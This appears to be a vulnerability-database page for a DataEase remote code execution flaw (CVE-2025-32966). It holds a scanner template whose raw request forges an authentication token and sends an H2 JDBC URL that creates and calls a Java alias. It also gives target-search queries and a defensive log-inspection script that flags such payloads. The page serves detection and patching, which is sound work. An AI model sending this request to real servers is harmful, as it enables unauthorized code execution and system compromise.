DataEase 2.10.4-2.10.7 - Remote Code Execution
CVE-2025-32966
Verified
Description
DataEase prior to version 2.10.8 contains a remote code execution vulnerability caused by insecure handling of backend JDBC links, which lets authenticated users execute arbitrary code. Exploitation requires user authentication.
Severity
Critical
CVSS Score
9.8
Exploit Probability
5%
Affected Product
dataease
Published Date
May 2, 2026
Template Author
chrisjr404
CVE-2025-32966.yaml
id: CVE-2025-32966

info:
  name: DataEase 2.10.4-2.10.7 - Remote Code Execution
  author: ChrisJr404
  severity: critical
  description: |
    DataEase prior to version 2.10.8 contains a remote code execution vulnerability caused by insecure handling of backend JDBC links, which lets authenticated users execute arbitrary code. Exploitation requires user authentication.
  impact: |
    Authenticated users can execute arbitrary code on the server, potentially leading to full system compromise.
  remediation: |
    Update to version 2.10.8 or later.
  reference:
    - https://github.com/dataease/dataease/security/advisories/GHSA-h7hj-4j78-cvc7
    - https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
    - https://github.com/vulhub/vulhub/tree/master/dataease/CVE-2025-32966
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-32966
    cwe-id: CWE-94
    epss-score: 0.05147
    epss-percentile: 0.90129
  metadata:
    verified: true
    max-request: 1
    vendor: dataease
    product: dataease
    shodan-query: http.html:"dataease"
    fofa-query: body="dataease"
  tags: cve,cve2025,dataease,h2,rce,jdbc,oss

variables:
  unique: "{{rand_text_alpha(10)}}.{{rand_text_alpha(8)}}.local"
  inner_payload: '{"jdbc":"jdbc:h2:mem:pwn;MODE=MSSQLServer;INIT=CREATE ALIAS LK AS $$void lk() throws java.io.IOException { java.net.InetAddress.getByName(\"{{unique}}\")\\; }$$\\;CALL LK()","username":"","password":"","driver":"org.h2.Driver"}'
  conf_b64: "{{base64(inner_payload)}}"
  jwt_claims: '{"uid":1,"oid":1,"exp":{{unix_time(3600)}}}'
  forged_jwt: '{{generate_jwt(jwt_claims,"HS256","ChrisJr404") }}'

http:
  - raw:
      - |
        POST /de2api/datasource/validate HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        X-DE-TOKEN: {{forged_jwt}}

        {"name":"p","type":"h2","configuration":"{{conf_b64}}"}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 400'
          - 'contains_all(body, "Exception calling user-defined function", "{{unique}}", "CREATE ALIAS LK")'
        condition: and
# digest: 490a004630440220407964c9a9b2cd0618bfc0fe03bf7b5a7633963f5fd4988ff5574483fa09f95602206e98faf290dcdc77cd49688ed6e20483020c8aafe9e39e5781b53caaa88e911a:922c64590222798bb761d5b6d8e72950
CVSS Metrics
CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2025-32966
CWE ID:
cwe-94
Remediation Steps
Update to version 2.10.8 or later.
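
A defender-side check for the request shape in the template above, added here as an example and not part of the template or of DataEase: it decodes the base64 `configuration` field of bodies posted to `/de2api/datasource/validate` and flags H2 connections and connect-time SQL in the JDBC URL. The function names, the marker list and the sample bodies are assumptions constructed for the example.

```python
import base64
import json
import re

# Endpoint the template on this page posts to.
VALIDATE_PATH = "/de2api/datasource/validate"
# Connect-time SQL markers in an H2 URL. The list is an assumption made for
# this example and is not exhaustive.
RISKY = re.compile(r"INIT\s*=|CREATE\s+ALIAS|RUNSCRIPT", re.IGNORECASE)


def inspect_datasource_request(path, body):
    """Return findings for one logged request; an empty list means clean."""
    if not path.startswith(VALIDATE_PATH):
        return []
    try:
        outer = json.loads(body)
        raw = base64.b64decode(outer["configuration"], validate=True)
        conf = json.loads(raw)
        jdbc = str(conf.get("jdbc", ""))
        driver = str(conf.get("driver", ""))
    except (ValueError, TypeError, KeyError, AttributeError):
        return ["unparseable datasource configuration"]
    findings = []
    if jdbc.lower().startswith("jdbc:h2:") or driver.lower() == "org.h2.driver":
        findings.append("client-supplied H2 connection")
    hit = RISKY.search(jdbc)
    if hit:
        findings.append("connect-time SQL in JDBC URL: " + hit.group(0))
    return findings


def make_body(conf, ds_type):
    """Build a request body in the shape shown in the template (constructed)."""
    enc = base64.b64encode(json.dumps(conf).encode()).decode()
    return json.dumps({"name": "p", "type": ds_type, "configuration": enc})


# Constructed samples; the alias body is elided on purpose.
SUSPICIOUS = make_body({"jdbc": "jdbc:h2:mem:t;MODE=MSSQLServer;INIT=CREATE ALIAS LK AS ...",
                        "username": "", "password": "", "driver": "org.h2.Driver"}, "h2")
BENIGN = make_body({"jdbc": "jdbc:mysql://db.example.internal:3306/sales",
                    "username": "report", "password": "x", "driver": "com.mysql.cj.jdbc.Driver"}, "mysql")

if __name__ == "__main__":
    for label, body in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, inspect_datasource_request(VALIDATE_PATH, body))
```

Run it over request bodies captured at a reverse proxy or WAF; a non-empty result on this endpoint is worth reviewing even after upgrading to 2.10.8.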